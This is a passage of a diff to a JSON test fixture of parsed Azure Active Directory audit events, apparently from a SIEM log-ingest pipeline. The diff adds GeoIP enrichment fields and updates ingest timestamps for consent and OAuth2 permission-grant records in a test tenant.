Id\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 
5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -9992,6 +10616,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -10158,7 +10794,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125147200Z", + "ingested": "2021-12-14T14:48:43.176714527Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\"
:[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", 
"provider": "AzureActiveDirectory", @@ -10185,6 +10821,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -10351,7 +10999,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125153900Z", + "ingested": "2021-12-14T14:48:43.176715909Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\"
:[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", 
"provider": "AzureActiveDirectory", @@ -10378,6 +11026,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -10544,7 +11204,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125160100Z", + "ingested": "2021-12-14T14:48:43.176716648Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\"
:[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", 
"provider": "AzureActiveDirectory", @@ -10571,6 +11231,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -10737,7 +11409,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125163800Z", + "ingested": "2021-12-14T14:48:43.176717512Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
